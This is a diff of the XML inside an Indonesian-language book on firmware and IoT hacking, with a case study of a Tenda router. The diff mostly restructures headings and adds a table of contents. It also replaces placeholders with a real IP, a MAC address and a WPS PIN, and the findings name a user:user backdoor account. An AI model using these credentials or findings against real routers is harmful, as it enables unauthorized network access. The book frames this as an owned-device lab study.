--- a/book/BUKU-LENGKAP-Hardware-Firmware-IoT-Hacking.docx
+++ b/book/BUKU-LENGKAP-Hardware-Firmware-IoT-Hacking.docx
@@ -1302,13 +1302,100 @@
         <w:t>Gambar 0.3 Ghidra (live): fromSysToolBaseUser membaca sys.baseusername/sys.baseuserpass.</w:t>
       </w:r>
     </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading1"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Daftar Isi</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t>BAGIAN I — Laporan Assessment (Studi Kasus: Router Tenda)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t>BAGIAN II — Belajar Firmware &amp; IoT Hacking</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t>BAGIAN III — Reverse Engineering &amp; Binary Exploitation (MIPS)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t>BAGIAN IV — RCE &amp; Privilege Escalation</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t>BAGIAN V — Emulasi Terisolasi &amp; Uji Overflow Aman</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t>BAGIAN VI — Uji di Perangkat Asli &amp; Pemulihan</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t>BAGIAN VII — Temuan Lanjutan (Backdoor, Privesc, Root Shell)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t>BAGIAN VIII — Bukti Backdoor user:user (Ghidra)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t>BAGIAN IX — Sesi Live (Ghidra, Cutter, GDB)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t>BAGIAN X — Reproduksi &amp; Verifikasi (Repo)</w:t>
+      </w:r>
+    </w:p>
     <w:p/>
     <w:p/>
     <w:p/>
     <w:p/>
     <w:p/>
     <w:p/>
-    <w:p/>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading1"/>
@@ -1318,7 +1405,7 @@
         <w:rPr>
           <w:b/>
           <w:color w:val="888888"/>
-          <w:sz w:val="32"/>
+          <w:sz w:val="44"/>
         </w:rPr>
         <w:t>BAGIAN I</w:t>
       </w:r>
@@ -1332,9 +1419,14 @@
         <w:rPr>
           <w:b/>
           <w:color w:val="0B3D91"/>
-          <w:sz w:val="48"/>
+          <w:sz w:val="52"/>
         </w:rPr>
         <w:t>Laporan Assessment (Studi Kasus: Router Tenda)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:br w:type="page"/>
       </w:r>
     </w:p>
     <w:p>
@@ -1469,7 +1561,7 @@
               <w:rPr>
                 <w:sz w:val="19"/>
               </w:rPr>
-              <w:t>Penulis (lab pribadi)</w:t>
+              <w:t>Farrel (lab pribadi)</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -1497,7 +1589,7 @@
               <w:rPr>
                 <w:sz w:val="19"/>
               </w:rPr>
-              <w:t>Parrot Linux (VM) — &lt;ANALYST-IP&gt;/24</w:t>
+              <w:t>Parrot Linux (VM) — 192.168.0.100/24</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -1553,7 +1645,7 @@
               <w:rPr>
                 <w:sz w:val="19"/>
               </w:rPr>
-              <w:t>Tenda — &lt;ROUTER-MAC&gt; (OUI Tenda)</w:t>
+              <w:t>Tenda — d8:32:14:5d:5a:80 (OUI Tenda)</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -1667,7 +1759,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading1"/>
+        <w:pStyle w:val="Heading2"/>
       </w:pPr>
       <w:r>
         <w:t>1. Ringkasan Eksekutif (TL;DR)</w:t>
@@ -1721,7 +1813,7 @@
         <w:pStyle w:val="ListBullet"/>
       </w:pPr>
       <w:r>
-        <w:t>WPS aktif dan PIN-nya bisa dibaca (&lt;WPS-PIN&gt;).</w:t>
+        <w:t>WPS aktif dan PIN-nya bisa dibaca (69043949).</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1742,7 +1834,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading1"/>
+        <w:pStyle w:val="Heading2"/>
       </w:pPr>
       <w:r>
         <w:t>2. Fingerprint Perangkat (Bukti Live)</w:t>
@@ -1903,7 +1995,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading1"/>
+        <w:pStyle w:val="Heading2"/>
       </w:pPr>
       <w:r>
         <w:t>3. Metodologi</w:t>
@@ -1976,7 +2068,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading1"/>
+        <w:pStyle w:val="Heading2"/>
       </w:pPr>
       <w:r>
         <w:t>4. Temuan (Findings)</w:t>
@@ -1984,7 +2076,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading2"/>
+        <w:pStyle w:val="Heading3"/>
       </w:pPr>
       <w:r>
         <w:t>F-01 — CRITICAL: Authentication Bypass / Backdoor Account user:user (CVSS 9.8)</w:t>
@@ -2132,7 +2224,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading2"/>
+        <w:pStyle w:val="Heading3"/>
       </w:pPr>
       <w:r>
         <w:t>F-02 — HIGH: WPS Aktif &amp; PIN Bocor</w:t>
@@ -2187,7 +2279,7 @@
           <w:color w:val="555555"/>
           <w:sz w:val="18"/>
         </w:rPr>
-        <w:t>Gambar 5. /goform/WifiWpsGet: WPS aktif, PIN &lt;WPS-PIN&gt;.</w:t>
+        <w:t>Gambar 5. /goform/WifiWpsGet: WPS aktif, PIN 69043949.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2201,7 +2293,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading2"/>
+        <w:pStyle w:val="Heading3"/>
       </w:pPr>
       <w:r>
         <w:t>F-03 — HIGH: Information Disclosure — Source Web Tanpa Autentikasi</w:t>
@@ -2270,7 +2362,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading2"/>
+        <w:pStyle w:val="Heading3"/>
       </w:pPr>
       <w:r>
         <w:t>F-04 — HIGH: Admin Panel Hanya HTTP (Tanpa HTTPS) + MD5 Client-Side</w:t>
@@ -2287,7 +2379,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading2"/>
+        <w:pStyle w:val="Heading3"/>
       </w:pPr>
       <w:r>
         <w:t>F-05 — MEDIUM: 4 Port TCP Non-Standar Terbuka</w:t>
@@ -2356,7 +2448,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading2"/>
+        <w:pStyle w:val="Heading3"/>
       </w:pPr>
       <w:r>
         <w:t>F-06 — MEDIUM: UPnP &amp; Tenda Cloud Aktif</w:t>
@@ -2425,7 +2517,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading2"/>
+        <w:pStyle w:val="Heading3"/>
       </w:pPr>
       <w:r>
         <w:t>F-07 — MEDIUM: Firmware Usang (2020) &amp; Banyak CVE Publik</w:t>
@@ -2955,44 +3047,44 @@
     </w:p>
     <w:p>
       <w:pPr>
+        <w:pStyle w:val="Heading3"/>
+      </w:pPr>
+      <w:r>
+        <w:t>F-08 — LOW/MEDIUM: Hardening HTTP Lemah &amp; Anti-Scan</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListBullet"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Tanpa header X-Frame-Options / CSP / HSTS; Server: "Http Server" (disguised).</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListBullet"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Inkonsistensi HTTP/1.0 vs HTTP/1.1 (indikasi dua server berbeda).</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListBullet"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Saat di-probe cepat, port 80 sempat di-blackhole ~30 detik lalu pulih (rate-limit).</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:br w:type="page"/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:pStyle w:val="Heading2"/>
-      </w:pPr>
-      <w:r>
-        <w:t>F-08 — LOW/MEDIUM: Hardening HTTP Lemah &amp; Anti-Scan</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Tanpa header X-Frame-Options / CSP / HSTS; Server: "Http Server" (disguised).</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Inkonsistensi HTTP/1.0 vs HTTP/1.1 (indikasi dua server berbeda).</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Saat di-probe cepat, port 80 sempat di-blackhole ~30 detik lalu pulih (rate-limit).</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:br w:type="page"/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading1"/>
       </w:pPr>
       <w:r>
         <w:t>5. Reproduksi Cepat (PoC)</w:t>
@@ -3034,7 +3126,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading1"/>
+        <w:pStyle w:val="Heading2"/>
       </w:pPr>
       <w:r>
         <w:t>6. Rekomendasi (Perbaikan)</w:t>
@@ -3149,7 +3241,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading1"/>
+        <w:pStyle w:val="Heading2"/>
       </w:pPr>
       <w:r>
         <w:t>7. Lampiran</w:t>
@@ -3257,7 +3349,6 @@
     <w:p/>
     <w:p/>
     <w:p/>
-    <w:p/>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading1"/>
@@ -3267,7 +3358,7 @@
         <w:rPr>
           <w:b/>
           <w:color w:val="888888"/>
-          <w:sz w:val="32"/>
+          <w:sz w:val="44"/>
         </w:rPr>
         <w:t>BAGIAN II</w:t>
       </w:r>
@@ -3281,9 +3372,14 @@
         <w:rPr>
           <w:b/>
           <w:color w:val="0B3D91"/>
-          <w:sz w:val="48"/>
+          <w:sz w:val="52"/>
         </w:rPr>
         <w:t>Belajar Firmware &amp; IoT Hacking</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:br w:type="page"/>
       </w:r>
     </w:p>
     <w:p>
@@ -3468,7 +3564,7 @@
               <w:rPr>
                 <w:sz w:val="18"/>
               </w:rPr>
-              <w:t>Parrot Linux VM (&lt;ANALYST-IP&gt;), alat: nmap, curl, binwalk</w:t>
+              <w:t>Parrot Linux VM (192.168.0.100), alat: nmap, curl, binwalk</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -3546,14 +3642,6 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading1"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Daftar Isi</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
       <w:r>
         <w:rPr>
           <w:b/>
@@ -3816,17 +3904,17 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading1"/>
-      </w:pPr>
-      <w:r>
-        <w:t>BAGIAN 0 — Cara Memakai Buku Ini</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
       <w:r>
+        <w:t>Cara Memakai Buku Ini</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading3"/>
+      </w:pPr>
+      <w:r>
         <w:t>0.1 Untuk siapa &amp; tujuannya</w:t>
       </w:r>
     </w:p>
@@ -3888,119 +3976,119 @@
     </w:p>
     <w:p>
       <w:pPr>
+        <w:pStyle w:val="Heading3"/>
+      </w:pPr>
+      <w:r>
+        <w:t>0.2 Prasyarat</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListBullet"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Dasar jaringan: IP, subnet, gateway, TCP/UDP, HTTP.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListBullet"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Dasar Linux CLI: cd, ls, grep, pipe, curl, chmod.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListBullet"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Sedikit pemrograman (C lebih baik) untuk memahami overflow/injection.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading3"/>
+      </w:pPr>
+      <w:r>
+        <w:t>0.3 Setup lab yang aman</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListBullet"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Gunakan perangkat milik sendiri atau lab yang diberi izin.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListBullet"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Pisahkan lab di VLAN/SSID terpisah agar tidak mengganggu jaringan penting.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListBullet"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Simpan file bukti di folder khusus (contoh: evidence/).</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListBullet"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Selalu mulai dengan aksi read-only; hindari reboot/flash sampai paham risikonya.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading3"/>
+      </w:pPr>
+      <w:r>
+        <w:t>0.4 Aturan emas</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+        </w:rPr>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t>Jangan pernah menguji perangkat/network yang bukan milik Anda tanpa izin tertulis.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Pengetahuan ini untuk memahami dan memperbaiki, bukan untuk merusak.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:br w:type="page"/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
       <w:r>
-        <w:t>0.2 Prasyarat</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Dasar jaringan: IP, subnet, gateway, TCP/UDP, HTTP.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Dasar Linux CLI: cd, ls, grep, pipe, curl, chmod.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Sedikit pemrograman (C lebih baik) untuk memahami overflow/injection.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
-      </w:pPr>
-      <w:r>
-        <w:t>0.3 Setup lab yang aman</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Gunakan perangkat milik sendiri atau lab yang diberi izin.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Pisahkan lab di VLAN/SSID terpisah agar tidak mengganggu jaringan penting.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Simpan file bukti di folder khusus (contoh: evidence/).</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Selalu mulai dengan aksi read-only; hindari reboot/flash sampai paham risikonya.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
-      </w:pPr>
-      <w:r>
-        <w:t>0.4 Aturan emas</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-        <w:t>Jangan pernah menguji perangkat/network yang bukan milik Anda tanpa izin tertulis.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Pengetahuan ini untuk memahami dan memperbaiki, bukan untuk merusak.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:br w:type="page"/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading1"/>
-      </w:pPr>
-      <w:r>
-        <w:t>BAGIAN I — FONDASI</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
+        <w:t>FONDASI</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading3"/>
       </w:pPr>
       <w:r>
         <w:t>1. Hardware vs Firmware vs IoT Hacking</w:t>
@@ -4080,7 +4168,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading3"/>
+        <w:pStyle w:val="Heading4"/>
       </w:pPr>
       <w:r>
         <w:t>1.1 Hardware hacking</w:t>
@@ -4132,7 +4220,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading3"/>
+        <w:pStyle w:val="Heading4"/>
       </w:pPr>
       <w:r>
         <w:t>1.2 Firmware hacking</w:t>
@@ -4160,7 +4248,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading3"/>
+        <w:pStyle w:val="Heading4"/>
       </w:pPr>
       <w:r>
         <w:t>1.3 IoT hacking</w:t>
@@ -4200,7 +4288,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading3"/>
+        <w:pStyle w:val="Heading4"/>
       </w:pPr>
       <w:r>
         <w:t>1.4 Alur belajar yang disarankan (sesuai alat Anda)</w:t>
@@ -4236,7 +4324,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading2"/>
+        <w:pStyle w:val="Heading3"/>
       </w:pPr>
       <w:r>
         <w:t>2. Mindset &amp; Metodologi</w:t>
@@ -4375,7 +4463,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading2"/>
+        <w:pStyle w:val="Heading3"/>
       </w:pPr>
       <w:r>
         <w:t>3. Anatomi Sebuah Router</w:t>
@@ -4731,17 +4819,17 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading1"/>
-      </w:pPr>
-      <w:r>
-        <w:t>BAGIAN II — RECON &amp; WEB (STUDI KASUS TENDA)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
       <w:r>
+        <w:t>RECON &amp; WEB (STUDI KASUS TENDA)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading3"/>
+      </w:pPr>
+      <w:r>
         <w:t>4. Fingerprinting: Mengenal Target</w:t>
       </w:r>
     </w:p>
@@ -4767,7 +4855,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading3"/>
+        <w:pStyle w:val="Heading4"/>
       </w:pPr>
       <w:r>
         <w:t>4.1 OUI / MAC — siapa vendornya?</w:t>
@@ -4786,7 +4874,7 @@
         <w:br/>
         <w:t>arp -n 192.168.0.1</w:t>
         <w:br/>
-        <w:t># -&gt; &lt;ROUTER-MAC&gt;</w:t>
+        <w:t># -&gt; d8:32:14:5d:5a:80</w:t>
         <w:br/>
         <w:t># 3 byte pertama (d8:32:14) = OUI = Tenda</w:t>
       </w:r>
@@ -4812,7 +4900,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading3"/>
+        <w:pStyle w:val="Heading4"/>
       </w:pPr>
       <w:r>
         <w:t>4.2 Header HTTP &amp; judul halaman</w:t>
@@ -4862,7 +4950,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading3"/>
+        <w:pStyle w:val="Heading4"/>
       </w:pPr>
       <w:r>
         <w:t>4.3 File konfigurasi klien bocor = versi &amp; chipset</w:t>
@@ -4961,7 +5049,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading2"/>
+        <w:pStyle w:val="Heading3"/>
       </w:pPr>
       <w:r>
         <w:t>5. Port Scanning &amp; Service Enumeration</w:t>
@@ -4977,7 +5065,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading3"/>
+        <w:pStyle w:val="Heading4"/>
       </w:pPr>
       <w:r>
         <w:t>5.1 Scan cepat vs lengkap</w:t>
@@ -5061,50 +5149,109 @@
     </w:p>
     <w:p>
       <w:pPr>
+        <w:pStyle w:val="Heading4"/>
+      </w:pPr>
+      <w:r>
+        <w:t>5.2 Membaca hasil &amp; pola</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListBullet"/>
+      </w:pPr>
+      <w:r>
+        <w:t>80/http = panel admin (permukaan utama kita).</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListBullet"/>
+      </w:pPr>
+      <w:r>
+        <w:t>5500, 9000, 10004, 52881 = non-standar dan tak berdokumentasi → patut dicurigai.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListBullet"/>
+      </w:pPr>
+      <w:r>
+        <w:t>443 tertutup → tidak ada HTTPS (kredensial lewat cleartext).</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListBullet"/>
+      </w:pPr>
+      <w:r>
+        <w:t>23/telnet &amp; 22/ssh tertutup (bagus), tapi layanan lain bisa jadi jalan masuk.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading4"/>
+      </w:pPr>
+      <w:r>
+        <w:t>5.3 Tanda bahaya khusus</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Port tinggi yang </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t>stabil</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> (menerima koneksi tapi tak mengirim banner) sering = service kustom pabrik (cloud/app/UPnP). Ini permukaan serangan yang jarang diuji.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+        </w:rPr>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t>Kita juga menemukan fenomena menarik:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> setelah melakukan banyak koneksi cepat, port 80 sempat 'diblokir' ~30 detik lalu pulih. Itu tanda </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t>rate-limit/anti-scan</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+        </w:rPr>
+        <w:t>. Pelajaran: perangkat bisa punya proteksi DoS sendiri; scan pelan (`-T2`) untuk menghindarinya.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:pStyle w:val="Heading3"/>
       </w:pPr>
       <w:r>
-        <w:t>5.2 Membaca hasil &amp; pola</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet"/>
-      </w:pPr>
-      <w:r>
-        <w:t>80/http = panel admin (permukaan utama kita).</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet"/>
-      </w:pPr>
-      <w:r>
-        <w:t>5500, 9000, 10004, 52881 = non-standar dan tak berdokumentasi → patut dicurigai.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet"/>
-      </w:pPr>
-      <w:r>
-        <w:t>443 tertutup → tidak ada HTTPS (kredensial lewat cleartext).</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet"/>
-      </w:pPr>
-      <w:r>
-        <w:t>23/telnet &amp; 22/ssh tertutup (bagus), tapi layanan lain bisa jadi jalan masuk.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading3"/>
-      </w:pPr>
-      <w:r>
-        <w:t>5.3 Tanda bahaya khusus</w:t>
+        <w:t>6. Web Enumeration: Menemukan Endpoint &amp; Kebocoran</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5112,71 +5259,12 @@
         <w:rPr>
           <w:b w:val="0"/>
         </w:rPr>
-        <w:t xml:space="preserve">Port tinggi yang </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-        <w:t>stabil</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> (menerima koneksi tapi tak mengirim banner) sering = service kustom pabrik (cloud/app/UPnP). Ini permukaan serangan yang jarang diuji.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-        <w:t>Kita juga menemukan fenomena menarik:</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> setelah melakukan banyak koneksi cepat, port 80 sempat 'diblokir' ~30 detik lalu pulih. Itu tanda </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-        <w:t>rate-limit/anti-scan</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-        </w:rPr>
-        <w:t>. Pelajaran: perangkat bisa punya proteksi DoS sendiri; scan pelan (`-T2`) untuk menghindarinya.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
-      </w:pPr>
-      <w:r>
-        <w:t>6. Web Enumeration: Menemukan Endpoint &amp; Kebocoran</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-        </w:rPr>
         <w:t>Ini inti web hacking: menemukan semua 'pintu' di aplikasi web. Ada dua cara: baca JS dan/atau brute-force path.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading3"/>
+        <w:pStyle w:val="Heading4"/>
       </w:pPr>
       <w:r>
         <w:t>6.1 Baca source dulu (gratis &amp; akurat)</w:t>
@@ -5252,7 +5340,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading3"/>
